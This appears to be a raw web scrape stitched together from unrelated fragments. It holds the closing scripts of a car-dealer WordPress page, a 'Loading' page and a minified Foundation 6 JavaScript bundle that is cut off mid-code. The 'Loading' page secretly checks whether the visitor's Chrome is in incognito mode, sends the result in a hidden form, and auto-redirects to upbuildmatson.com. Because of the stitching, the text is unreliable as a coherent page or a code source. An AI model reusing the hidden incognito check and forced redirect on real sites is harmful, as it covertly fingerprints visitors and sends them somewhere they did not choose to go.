addStylesNode.parentElement.removeChild(addStylesNode);document.body.classList.remove("atf-loading");}</script><script>if (document.readyState != 'loading') { loadDeferredStyles(); } else if (document.addEventListener) { document.addEventListener('DOMContentLoaded', loadDeferredStyles); } else { document.attachEvent('onreadystatechange', function () { if (document.readyState != 'loading') { loadDeferredStyles(); } }); }</script><script>function jzlLoadScript( src, callback ) { var script = document.createElement('script'); script.onerror = function() { console.error('Could not load ' + src); callback(); }; script.onload = function(){ console.debug('Loaded ' + src); callback(); }; script.src = src; document.getElementsByTagName('head')[0].appendChild(script); } (function() { var scripts = ["https://www.5starford.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4","https://www.5starford.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1","/content/plugins/jzl-util/analytics/js/jzaq.min.js?ver=20190206-1800","/content/plugins/jzl-util/body-scroll-lock/js/bodyScrollLock.min.js?ver=2.6.1","/content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.2.1"]; var delay = 10000; function loadScript(index, callback) { console.debug('calling loadScript with index', index); jzlLoadScript(scripts[index], function() { var nextIndex = index + 1; if (nextIndex < scripts.length) { loadScript(nextIndex, callback); } else { callback(); } }); } var timerToken = null; var handler = function() { console.debug('starting handler()'); loadScript(0, function() { console.debug('calling jzlDoJazelReady'); jzlDoJazelReady(); }); window.removeEventListener('click', handler, true); window.removeEventListener('scroll', handler, true); if (timerToken != null) { window.clearTimeout(timerToken); timerToken = null; } }; window.addEventListener('click', handler, true); window.addEventListener('scroll', handler, true); timerToken = window.setTimeout(handler, delay); })();</script><script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"29a037a487","applicationID":"101188607","transactionName":"bgZSYhAAWkYHBxVYW1dMcVUWCFtbSRQAVlE=","queueTime":0,"applicationTime":2668,"atts":"QkFRFFgaSUg=","errorBeacon":"bam.nr-data.net","agent":""}</script></body></html> <!-- AMP Runtime Version: 001809202142050 --> <!-- rocket-header-footer 0.073975801467896s (0dcf23c9) --><!-- rocket-ux-bars 0.65285301208496s (1bf3d4c5) --><!-- ATF CSS size: 81169 --><!-- defer: <script type='text/javascript' src='https://www.5starford.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> --><!-- defer: <script type='text/javascript' src='https://www.5starford.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> --><!-- async: <script async src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script> --><!-- defer: <script type='text/javascript' src='/content/plugins/jzl-util/analytics/js/jzaq.min.js?ver=20190206-1800'></script> --><!-- defer: <script type='text/javascript' src='/content/plugins/jzl-util/body-scroll-lock/js/bodyScrollLock.min.js?ver=2.6.1'></script> --><!-- dynamic_async: <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/mustache.js/3.0.1/mustache.min.js?ver=3.0.1'></script> --><!-- dynamic_async: <script type='text/javascript' src='/content/plugins/jzl-util/jzl-bind/js/jzl-bind.min.js?ver=20190507-0300'></script> --><!-- async: <script type='text/javascript' src='/content/themes/jazelbase/js/navigation.min.js?ver=20190222-0000'></script> --><!-- defer: <script type='text/javascript' src='/content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.2.1'></script> --><!-- JRO Scripts Async Regex Array translate.google.com, navigation.js, skip-link-focus-fix.js, wp-embed.min.js, TDDS_dealers_s_code.js, \/jazelbase\/js\/ --><!-- JRO Scripts Defer Regex Array \/jquery(\.min)?\.js, \/jquery-migrate(\.min)?\.js, \/jquery\.json(\.min)?\.js, \/gravityforms(\.min)?\.js, \/jquery\.textareaCounter\.plugin(\.min)?\.js, \/jquery\.maskedinput(\.min)?\.js, \/placeholders\.jquery(\.min)?\.js, \/jquery\.themepunch\.tools(\.min)?\.js, \/jquery\.themepunch\.revolution(\.min)?\.js, \/featherlight(\.min)?\.js, \/js_composer_front(\.min)?\.js, \/waypoints(\.min)?\.js, \/model_dropdown(\.min)?\.js, \/jquery\.js, \/jquery\/ui\/, \/gravityforms\/js\/, \/jquery-migrate\.min\., \/admin-bar\.min\., \/ofi\.min\., \/jzl-auto5-products\/, \/auto5-srp, \/lib\/waypoints\/waypoints\.min, \/jquery\.js, \/jquery-migrate\.min\., \/admin-bar\.min\., \/ofi\.min\., \/jzl-auto5-products\/, \/auto5-srp, \/lib\/waypoints\/waypoints\.min, \/static\/index.bundle\., js\/jzaq.min, js\/bodyScrollLock\.min -->
0
<html><head><meta http-equiv="refresh" content="5; url=http://ww9.upbuildmatson.com/"><title>Loading</title></head> <body><form method="post" action="http://upbuildmatson.com/" target="_top" id="rf"><input type="hidden" name="ic" value="0"><input type="hidden" name="fb" value="true"/></form> <script>!function(e,t){var n,i;return!e.navigator||!(n=navigator.userAgent)||n.indexOf("Chrome/")<0||!(i=e.RequestFileSystem||e.webkitRequestFileSystem)?t(0):void i(e.TEMPORARY,100,function(){t(0)},function(){t(1)})}(window,function(e){e&&(document.querySelector("input[name=ic]").value="1"),document.getElementById("rf").submit()})</script></body></html>
0
!function(i){function n(e){if(o[e])return o[e].exports;var t=o[e]={i:e,l:!1,exports:{}};return i[e].call(t.exports,t,t.exports,n),t.l=!0,t.exports}var o={};n.m=i,n.c=o,n.i=function(e){return e},n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:i})},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=36)}([function(e,t){e.exports=jQuery},function(e,t,i){"use strict";function n(){return"rtl"===r()("html").attr("dir")}function o(e,t){return e=e||6,Math.round(Math.pow(36,e+1)-Math.random()*Math.pow(36,e)).toString(36).slice(1)+(t?"-"+t:"")}function s(e){var t,i={transition:"transitionend",WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"otransitionend"},n=document.createElement("div");for(var o in i)void 0!==n.style[o]&&(t=i[o]);return t||(t=setTimeout(function(){e.triggerHandler("transitionend",[e])},1),"transitionend")}i.d(t,"a",function(){return n}),i.d(t,"b",function(){return o}),i.d(t,"c",function(){return s});var a=i(0),r=i.n(a)},function(e,t,o){"use strict";function i(e){return e.replace(/([a-z])([A-Z])/g,"$1-$2").toLowerCase()}function s(e){return void 0!==e.constructor.name?i(e.constructor.name):i(e.className)}o.d(t,"a",function(){return l});var n=o(0),a=(o.n(n),o(1)),r=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),l=function(){function n(e,t){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,n),this._setup(e,t);var i=s(this);this.uuid=o.i(a.b)(6,i),this.$element.attr("data-"+i)||this.$element.attr("data-"+i,this.uuid),this.$element.data("zfPlugin")||this.$element.data("zfPlugin",this),this.$element.trigger("init.zf."+i)}return r(n,[{key:"destroy",value:function(){this._destroy();var e=s(this);for(var t in this.$element.removeAttr("data-"+e).removeData("zfPlugin").trigger("destroyed.zf."+e),this)this[t]=null}}]),n}()},function(e,t,r){"use strict";function o(e){return!!e&&e.find("a[href], area[href], input:not([disabled]), select:not([disabled]), textarea:not([disabled]), button:not([disabled]), iframe, object, embed, *[tabindex], *[contenteditable]").filter(function(){return!(!l()(this).is(":visible")||l()(this).attr("tabindex")<0)})}function s(e){var t=n[e.which||e.keyCode]||String.fromCharCode(e.which).toUpperCase();return t=t.replace(/\W+/,""),e.shiftKey&&(t="SHIFT_"+t),e.ctrlKey&&(t="CTRL_"+t),e.altKey&&(t="ALT_"+t),t=t.replace(/_$/,"")}r.d(t,"a",function(){return a});var i=r(0),l=r.n(i),c=r(1),n={9:"TAB",13:"ENTER",27:"ESCAPE",32:"SPACE",35:"END",36:"HOME",37:"ARROW_LEFT",38:"ARROW_UP",39:"ARROW_RIGHT",40:"ARROW_DOWN"},u={},a={keys:function(e){var t={};for(var i in e)t[e[i]]=e[i];return t}(n),parseKey:s,handleKey:function(e,t,i){var n,o=u[t],s=this.parseKey(e);if(!o)return console.warn("Component not defined!");if((n=i[(void 0===o.ltr?o:r.i(c.a)()?l.a.extend({},o.ltr,o.rtl):l.a.extend({},o.rtl,o.ltr))[s]])&&"function"==typeof n){var a=n.apply();(i.handled||"function"==typeof i.handled)&&i.handled(a)}else(i.unhandled||"function"==typeof i.unhandled)&&i.unhandled()},findFocusable:o,register:function(e,t){u[e]=t},trapFocus:function(e){var t=o(e),i=t.eq(0),n=t.eq(-1);e.on("keydown.zf.trapfocus",function(e){e.target===n[0]&&"TAB"===s(e)?(e.preventDefault(),i.focus()):e.target===i[0]&&"SHIFT_TAB"===s(e)&&(e.preventDefault(),n.focus())})},releaseFocus:function(e){e.off("keydown.zf.trapfocus")}}},function(e,t,i){"use strict";i.d(t,"a",function(){return a});var n=i(0),s=i.n(n),o=window.matchMedia||function(){var t=window.styleMedia||window.media;if(!t){var i,n=document.createElement("style"),e=document.getElementsByTagName("script")[0];n.type="text/css",n.id="matchmediajs-test",e&&e.parentNode&&e.parentNode.insertBefore(n,e),i="getComputedStyle"in window&&window.getComputedStyle(n,null)||n.currentStyle,t={matchMedium:function(e){var t="@media "+e+"{ #matchmediajs-test { width: 1px; } }";return n.styleSheet?n.styleSheet.cssText=t:n.textContent=t,"1px"===i.width}}}return function(e){return{matches:t.matchMedium(e||"all"),media:e||"all"}}}(),a={queries:[],current:"",_init:function(){s()("meta.foundation-mq").length||s()('<meta class="foundation-mq">').appendTo(document.head);var e,t,i,n=s()(".foundation-mq").css("font-family");for(var o in i={},e="string"!=typeof(t=n)?i:(t=t.trim().slice(1,-1))?i=t.split("&").reduce(function(e,t){var i=t.replace(/\+/g," ").split("="),n=i[0],o=i[1];return n=decodeURIComponent(n),o=void 0===o?null:decodeURIComponent(o),e.hasOwnProperty(n)?Array.isArray(e[n])?e[n].push(o):e[n]=[e[n],o]:e[n]=o,e},{}):i)e.hasOwnProperty(o)&&this.queries.push({name:o,value:"only screen and (min-width: "+e[o]+")"});this.current=this._getCurrentSize(),this._watcher()},atLeast:function(e){var t=this.get(e);return!!t&&o(t).matches},is:function(e){return 1<(e=e.trim().split(" ")).length&&"only"===e[1]?e[0]===this._getCurrentSize():this.atLeast(e[0])},get:function(e){for(var t in this.queries)if(this.queries.hasOwnProperty(t)){var i=this.queries[t];if(e===i.name)return i.value}return null},_getCurrentSize:function(){for(var e,t=0;t<this.queries.length;t++){var i=this.queries[t];o(i.value).matches&&(e=i)}return"object"==typeof e?e.name:e},_watcher:function(){var i=this;s()(window).off("resize.zf.mediaquery").on("resize.zf.mediaquery",function(){var e=i._getCurrentSize(),t=i.current;e!==t&&(i.current=e,s()(window).trigger("changed.zf.mediaquery",[e,t]))})}}},function(e,t,i){"use strict";function n(t,e,i){var n=void 0,o=Array.prototype.slice.call(arguments,3);s()(window).off(e).on(e,function(e){n&&clearTimeout(n),n=setTimeout(function(){i.apply(null,o)},t||10)})}i.d(t,"a",function(){return c});var o=i(0),s=i.n(o),a=i(6),r=function(){for(var e=["WebKit","Moz","O","Ms",""],t=0;t<e.length;t++)if(e[t]+"MutationObserver"in window)return window[e[t]+"MutationObserver"];return!1}(),l=function(t,i){t.data(i).split(" ").forEach(function(e){s()("#"+e)["close"===i?"trigger":"triggerHandler"](i+".zf.trigger",[t])})},c={Listeners:{Basic:{},Global:{}},Initializers:{}};c.Listeners.Basic={openListener:function(){l(s()(this),"open")},closeListener:function(){s()(this).data("close")?l(s()(this),"close"):s()(this).trigger("close.zf.trigger")},toggleListener:function(){s()(this).data("toggle")?l(s()(this),"toggle"):s()(this).trigger("toggle.zf.trigger")},closeableListener:function(e){e.stopPropagation();var t=s()(this).data("closable");""!==t?a.a.animateOut(s()(this),t,function(){s()(this).trigger("closed.zf")}):s()(this).fadeOut().trigger("closed.zf")},toggleFocusListener:function(){var e=s()(this).data("toggle-focus");s()("#"+e).triggerHandler("toggle.zf.trigger",[s()(this)])}},c.Initializers.addOpenListener=function(e){e.off("click.zf.trigger",c.Listeners.Basic.openListener),e.on("click.zf.trigger","[data-open]",c.Listeners.Basic.openListener)},c.Initializers.addCloseListener=function(e){e.off("click.zf.trigger",c.Listeners.Basic.closeListener),e.on("click.zf.trigger","[data-close]",c.Listeners.Basic.closeListener)},c.Initializers.addToggleListener=function(e){e.off("click.zf.trigger",c.Listeners.Basic.toggleListener),e.on("click.zf.trigger","[data-toggle]",c.Listeners.Basic.toggleListener)},c.Initializers.addCloseableListener=function(e){e.off("close.zf.trigger",c.Listeners.Basic.closeableListener),e.on("close.zf.trigger","[data-closeable], [data-closable]",c.Listeners.Basic.closeableListener)},c.Initializers.addToggleFocusListener=function(e){e.off("focus.zf.trigger blur.zf.trigger",c.Listeners.Basic.toggleFocusListener),e.on("focus.zf.trigger blur.zf.trigger","[data-toggle-focus]",c.Listeners.Basic.toggleFocusListener)},c.Listeners.Global={resizeListener:function(e){r||e.each(function(){s()(this).triggerHandler("resizeme.zf.trigger")}),e.attr("data-events","resize")},scrollListener:function(e){r||e.each(function(){s()(this).triggerHandler("scrollme.zf.trigger")}),e.attr("data-events","scroll")},closeMeListener:function(e,t){var i=e.namespace.split(".")[0];s()("[data-"+i+"]").not('[data-yeti-box="'+t+'"]').each(function(){var e=s()(this);e.triggerHandler("close.zf.trigger",[e])})}},c.Initializers.addClosemeListener=function(e){var t=s()("[data-yeti-box]"),i=["dropdown","tooltip","reveal"];if(e&&("string"==typeof e?i.push(e):"object"==typeof e&&"string"==typeof e[0]?i.concat(e):console.error("Plugin names must be strings")),t.length){var n=i.map(function(e){return"closeme.zf."+e}).join(" ");s()(window).off(n).on(n,c.Listeners.Global.closeMeListener)}},c.Initializers.addResizeListener=function(e){var t=s()("[data-resize]");t.length&&n(e,"resize.zf.trigger",c.Listeners.Global.resizeListener,t)},c.Initializers.addScrollListener=function(e){var t=s()("[data-scroll]");t.length&&n(e,"scroll.zf.trigger",c.Listeners.Global.scrollListener,t)},c.Initializers.addMutationEventsListener=function(e){if(!r)return!1;var t=e.find("[data-resize], [data-scroll], [data-mutate]"),i=function(e){var t=s()(e[0].target);switch(e[0].type){case"attributes":"scroll"===t.attr("data-events")&&"data-events"===e[0].attributeName&&t.triggerHandler("scrollme.zf.trigger",[t,window.pageYOffset]),"resize"===t.attr("data-events")&&"data-events"===e[0].attributeName&&t.triggerHandler("resizeme.zf.trigger",[t]),"style"===e[0].attributeName&&(t.closest("[data-mutate]").attr("data-events","mutate"),t.closest("[data-mutate]").triggerHandler("mutateme.zf.trigger",[t.closest("[data-mutate]")]));break;case"childList":t.closest("[data-mutate]").attr("data-events","mutate"),t.closest("[data-mutate]").triggerHandler("mutateme.zf.trigger",[t.closest("[data-mutate]")]);break;default:return!1}};if(t.length)for(var n=0;n<=t.length-1;n++){new r(i).observe(t[n],{attributes:!0,childList:!0,characterData:!1,subtree:!0,attributeFilter:["data-events","style"]})}},c.Initializers.addSimpleListeners=function(){var e=s()(document);c.Initializers.addOpenListener(e),c.Initializers.addCloseListener(e),c.Initializers.addToggleListener(e),c.Initializers.addCloseableListener(e),c.Initializers.addToggleFocusListener(e)},c.Initializers.addGlobalListeners=function(){var e=s()(document);c.Initializers.addMutationEventsListener(e),c.Initializers.addResizeListener(),c.Initializers.addScrollListener(),c.Initializers.addClosemeListener()},c.init=function(e,t){if(void 0===e.triggersInitialized){e(document);"complete"===document.readyState?(c.Initializers.addSimpleListeners(),c.Initializers.addGlobalListeners()):e(window).on("load",function(){c.Initializers.addSimpleListeners(),c.Initializers.addGlobalListeners()}),e.triggersInitialized=!0}t&&(t.Triggers=c,t.IHearYou=c.Initializers.addGlobalListeners)}},function(e,t,r){"use strict";function i(i,n,o){var s,a,r=null;if(0===i)return o.apply(n),void n.trigger("finished.zf.animate",[n]).triggerHandler("finished.zf.animate",[n]);s=window.requestAnimationFrame(function e(t){r||(r=t),a=t-r,o.apply(n),a<i?s=window.requestAnimationFrame(e,n):(window.cancelAnimationFrame(s),n.trigger("finished.zf.animate",[n]).triggerHandler("finished.zf.animate",[n]))})}function n(e,t,i,n){function o(){t[0].style.transitionDuration=0,t.removeClass(s+" "+a+" "+i)}if((t=l()(t).eq(0)).length){var s=e?u[0]:u[1],a=e?d[0]:d[1];o(),t.addClass(i).css("transition","none"),requestAnimationFrame(function(){t.addClass(s),e&&t.show()}),requestAnimationFrame(function(){t[0].offsetWidth,t.css("transition","").addClass(a)}),t.one(r.i(c.c)(t),function(){e||t.hide(),o(),n&&n.apply(t)})}}r.d(t,"b",function(){return i}),r.d(t,"a",function(){return s});var o=r(0),l=r.n(o),c=r(1),u=["mui-enter","mui-leave"],d=["mui-enter-active","mui-leave-active"],s={animateIn:function(e,t,i){n(!0,e,t,i)},animateOut:function(e,t,i){n(!1,e,t,i)}}},function(e,t,a){"use strict";function s(e,t,i,n,o){var s,a,r,l,c=d(e);if(t){var u=d(t);a=u.height+u.offset.top-(c.offset.top+c.height),s=c.offset.top-u.offset.top,r=c.offset.left-u.offset.left,l=u.width+u.offset.left-(c.offset.left+c.width)}else a=c.windowDims.height+c.windowDims.offset.top-(c.offset.top+c.height),s=c.offset.top-c.windowDims.offset.top,r=c.offset.left-c.windowDims.offset.left,l=c.windowDims.width-(c.offset.left+c.width);return a=o?0:Math.min(a,0),s=Math.min(s,0),r=Math.min(r,0),l=Math.min(l,0),i?r+l:n?s+a:Math.sqrt(s*s+a*a+r*r+l*l)}function d(e){if((e=e.length?e[0]:e)===window||e===document)throw new Error("I'm sorry, Dave. I'm afraid I can't do that.");var t=e.getBoundingClientRect(),i=e.parentNode.getBoundingClientRect(),n=document.body.getBoundingClientRect(),o=window.pageYOffset,s=window.pageXOffset;return{width:t.width,height:t.height,offset:{top:t.top+o,left:t.left+s},parentDims:{width:i.width,height:i.height,offset:{top:i.top+o,left:i.left+s}},windowDims:{width:n.width,height:n.height,offset:{top:o,left:s}}}}function r(e,t,i,n,o,s,a){var r,l,c=d(e),u=t?d(t):null;switch(i){case"top":r=u.offset.top-(c.height+o);break;case"bottom":r=u.offset.top+u.height+o;break;case"left":l=u.offset.left-(c.width+s);break;case"right":l=u.offset.left+u.width+s}switch(i){case"top":case"bottom":switch(n){case"left":l=u.offset.left+s;break;case"right":l=u.offset.left-c.width+u.width-s;break;case"center":l=a?s:u.offset.left+u.width/2-c.width/2+s}break;case"right":case"left":switch(n){case"bottom":r=u.offset.top-o+u.height-c.height;break;case"top":r=u.offset.top+o;break;case"center":r=u.offset.top+o+u.height/2-c.height/2}}return{top:r,left:l}}a.d(t,"a",function(){return i});var l=a(1),i={ImNotTouchingYou:function(e,t,i,n,o){return 0===s(e,t,i,n,o)},OverlapArea:s,GetDimensions:d,GetOffsets:function(e,t,i,n,o,s){switch(console.log("NOTE: GetOffsets is deprecated in favor of GetExplicitOffsets and will be removed in 6.5"),i){case"top":return a.i(l.a)()?r(e,t,"top","left",n,o,s):r(e,t,"top","right",n,o,s);case"bottom":return a.i(l.a)()?r(e,t,"bottom","left",n,o,s):r(e,t,"bottom","right",n,o,s);case"center top":return r(e,t,"top","center",n,o,s);case"center bottom":return r(e,t,"bottom","center",n,o,s);case"center left":return r(e,t,"left","center",n,o,s);case"center right":return r(e,t,"right","center",n,o,s);case"left bottom":return r(e,t,"bottom","left",n,o,s);case"right bottom":return r(e,t,"bottom","right",n,o,s);case"center":return{left:$eleDims.windowDims.offset.left+$eleDims.windowDims.width/2-$eleDims.width/2+o,top:$eleDims.windowDims.offset.top+$eleDims.windowDims.height/2-($eleDims.height/2+n)};case"reveal":return{left:($eleDims.windowDims.width-$eleDims.width)/2+o,top:$eleDims.windowDims.offset.top+n};case"reveal full":return{left:$eleDims.windowDims.offset.left,top:$eleDims.windowDims.offset.top};default:return{left:a.i(l.a)()?$anchorDims.offset.left-$eleDims.width+$anchorDims.width-o:$anchorDims.offset.left+o,top:$anchorDims.offset.top+$anchorDims.height+n}}},GetExplicitOffsets:r}},function(e,t,i){"use strict";function n(e,t){function n(){0===--i&&t()}var i=e.length;0===i&&t(),e.each(function(){if(this.complete&&void 0!==this.naturalWidth)n();else{var e=new Image,i="load.zf.images error.zf.images";s()(e).one(i,function e(t){s()(this).off(i,e),n()}),e.src=s()(this).attr("src")}})}i.d(t,"a",function(){return n});var o=i(0),s=i.n(o)},function(e,t,i){"use strict";i.d(t,"a",function(){return o});var n=i(0),r=i.n(n),o={Feather:function(e){var i=1<arguments.length&&void 0!==arguments[1]?arguments[1]:"zf";e.attr("role","menubar");var t=e.find("li").attr({role:"menuitem"}),n="is-"+i+"-submenu",o=n+"-item",s="is-"+i+"-submenu-parent",a="accordion"!==i;t.each(function(){var e=r()(this),t=e.children("ul");t.length&&(e.addClass(s),t.addClass("submenu "+n).attr({"data-submenu":""}),a&&(e.attr({"aria-haspopup":!0,"aria-label":e.children("a:first").text()}),"drilldown"===i&&e.attr({"aria-expanded":!1})),t.addClass("submenu "+n).attr({"data-submenu":"",role:"menu"}),"drilldown"===i&&t.attr({"aria-hidden":!0})),e.parent("[data-submenu]").length&&e.addClass("is-submenu-item "+o)})},Burn:function(e,t){var i="is-"+t+"-submenu",n=i+"-item",o="is-"+t+"-submenu-parent";e.find(">li, .menu, .menu > li").removeClass(i+" "+n+" "+o+" is-submenu-item submenu is-active").removeAttr("data-submenu").css("display","")}}},function(e,t,i){"use strict";function o(){this.removeEventListener("touchmove",n),this.removeEventListener("touchend",o),f=!1}function n(e){if(d.a.spotSwipe.preventDefault&&e.preventDefault(),f){var t,i=e.touches[0].pageX,n=(e.touches[0].pageY,r-i);c=(new Date).getTime()-l,Math.abs(n)>=d.a.spotSwipe.moveThreshold&&c<=d.a.spotSwipe.timeThreshold&&(t=0<n?"left":"right"),t&&(e.preventDefault(),o.call(this),d()(this).trigger("swipe",t).trigger("swipe"+t))}}function s(e){1==e.touches.length&&(r=e.touches[0].pageX,e.touches[0].pageY,f=!0,l=(new Date).getTime(),this.addEventListener("touchmove",n,!1),this.addEventListener("touchend",o,!1))}function a(){this.addEventListener&&this.addEventListener("touchstart",s,!1)}i.d(t,"a",function(){return p});var r,l,c,u=i(0),d=i.n(u),h=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),p={},f=!1,m=function(){function t(e){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,t),this.version="1.0.0",this.enabled="ontouchstart"in document.documentElement,this.preventDefault=!1,this.moveThreshold=75,this.timeThreshold=200,this.$=e,this._init()}return h(t,[{key:"_init",value:function(){var e=this.$;e.event.special.swipe={setup:a},e.each(["left","up","down","right"],function(){e.event.special["swipe"+this]={setup:function(){e(this).on("swipe",e.noop)}}})}}]),t}();p.setupSpotSwipe=function(e){e.spotSwipe=new m(e)},p.setupTouchHandler=function(n){n.fn.addTouch=function(){this.each(function(e,t){n(t).bind("touchstart touchmove touchend touchcancel",function(){i(event)})});var i=function(e){var t,i=e.changedTouches[0],n={touchstart:"mousedown",touchmove:"mousemove",touchend:"mouseup"}[e.type];"MouseEvent"in window&&"function"==typeof window.MouseEvent?t=new window.MouseEvent(n,{bubbles:!0,cancelable:!0,screenX:i.screenX,screenY:i.screenY,clientX:i.clientX,clientY:i.clientY}):(t=document.createEvent("MouseEvent")).initMouseEvent(n,!0,!0,window,1,i.screenX,i.screenY,i.clientX,i.clientY,!1,!1,!1,!1,0,null),i.target.dispatchEvent(t)}}},p.init=function(e){void 0===e.spotSwipe&&(p.setupSpotSwipe(e),p.setupTouchHandler(e))}},function(e,t,a){"use strict";a.d(t,"a",function(){return c});var i=a(0),r=a.n(i),o=a(3),l=a(1),n=a(2),s=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,n["a"]),s(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=r.a.extend({},i.defaults,this.$element.data(),t),this.className="Accordion",this._init(),o.a.register("Accordion",{ENTER:"toggle",SPACE:"toggle",ARROW_DOWN:"next",ARROW_UP:"previous"})}},{key:"_init",value:function(){var o=this;this.$element.attr("role","tablist"),this.$tabs=this.$element.children("[data-accordion-item]"),this.$tabs.each(function(e,t){var i=r()(t),n=i.children("[data-tab-content]"),o=n[0].id||a.i(l.b)(6,"accordion"),s=t.id||o+"-label";i.find("a:first").attr({"aria-controls":o,role:"tab",id:s,"aria-expanded":!1,"aria-selected":!1}),n.attr({role:"tabpanel","aria-labelledby":s,"aria-hidden":!0,id:o})});var e=this.$element.find(".is-active").children("[data-tab-content]");this.firstTimeInit=!0,e.length&&(this.down(e,this.firstTimeInit),this.firstTimeInit=!1),this._checkDeepLink=function(){var e=window.location.hash;if(e.length){var t=o.$element.find('[href$="'+e+'"]'),i=r()(e);if(t.length&&i){if(t.parent("[data-accordion-item]").hasClass("is-active")||(o.down(i,o.firstTimeInit),o.firstTimeInit=!1),o.options.deepLinkSmudge){var n=o;r()(window).load(function(){var e=n.$element.offset();r()("html, body").animate({scrollTop:e.top},n.options.deepLinkSmudgeDelay)})}o.$element.trigger("deeplink.zf.accordion",[t,i])}}},this.options.deepLink&&this._checkDeepLink(),this._events()}},{key:"_events",value:function(){var n=this;this.$tabs.each(function(){var t=r()(this),i=t.children("[data-tab-content]");i.length&&t.children("a").off("click.zf.accordion keydown.zf.accordion").on("click.zf.accordion",function(e){e.preventDefault(),n.toggle(i)}).on("keydown.zf.accordion",function(e){o.a.handleKey(e,"Accordion",{toggle:function(){n.toggle(i)},next:function(){var e=t.next().find("a").focus();n.options.multiExpand||e.trigger("click.zf.accordion")},previous:function(){var e=t.prev().find("a").focus();n.options.multiExpand||e.trigger("click.zf.accordion")},handled:function(){e.preventDefault(),e.stopPropagation()}})})}),this.options.deepLink&&r()(window).on("popstate",this._checkDeepLink)}},{key:"toggle",value:function(e){if(e.closest("[data-accordion]").is("[disabled]"))console.info("Cannot toggle an accordion that is disabled.");else if(e.parent().hasClass("is-active")?this.up(e):this.down(e),this.options.deepLink){var t=e.prev("a").attr("href");this.options.updateHistory?history.pushState({},"",t):history.replaceState({},"",t)}}},{key:"down",value:function(e,t){var i=this;if(!e.closest("[data-accordion]").is("[disabled]")||t){if(e.attr("aria-hidden",!1).parent("[data-tab-content]").addBack().parent().addClass("is-active"),!this.options.multiExpand&&!t){var n=this.$element.children(".is-active").children("[data-tab-content]");n.length&&this.up(n.not(e))}e.slideDown(this.options.slideSpeed,function(){i.$element.trigger("down.zf.accordion",[e])}),r()("#"+e.attr("aria-labelledby")).attr({"aria-expanded":!0,"aria-selected":!0})}else console.info("Cannot call down on an accordion that is disabled.")}},{key:"up",value:function(e){if(e.closest("[data-accordion]").is("[disabled]"))console.info("Cannot call up on an accordion that is disabled.");else{var t=e.parent().siblings(),i=this;(this.options.allowAllClosed||t.hasClass("is-active"))&&e.parent().hasClass("is-active")&&(e.slideUp(i.options.slideSpeed,function(){i.$element.trigger("up.zf.accordion",[e])}),e.attr("aria-hidden",!0).parent().removeClass("is-active"),r()("#"+e.attr("aria-labelledby")).attr({"aria-expanded":!1,"aria-selected":!1}))}}},{key:"_destroy",value:function(){this.$element.find("[data-tab-content]").stop(!0).slideUp(0).css("display",""),this.$element.find("a").off(".zf.accordion"),this.options.deepLink&&r()(window).off("popstate",this._checkDeepLink)}}]),i}();c.defaults={slideSpeed:250,multiExpand:!1,allowAllClosed:!1,deepLink:!1,deepLinkSmudge:!1,deepLinkSmudgeDelay:300,updateHistory:!1}},function(e,t,a){"use strict";a.d(t,"a",function(){return u});var i=a(0),r=a.n(i),l=a(3),n=a(9),c=a(1),o=a(2),s=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),u=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof 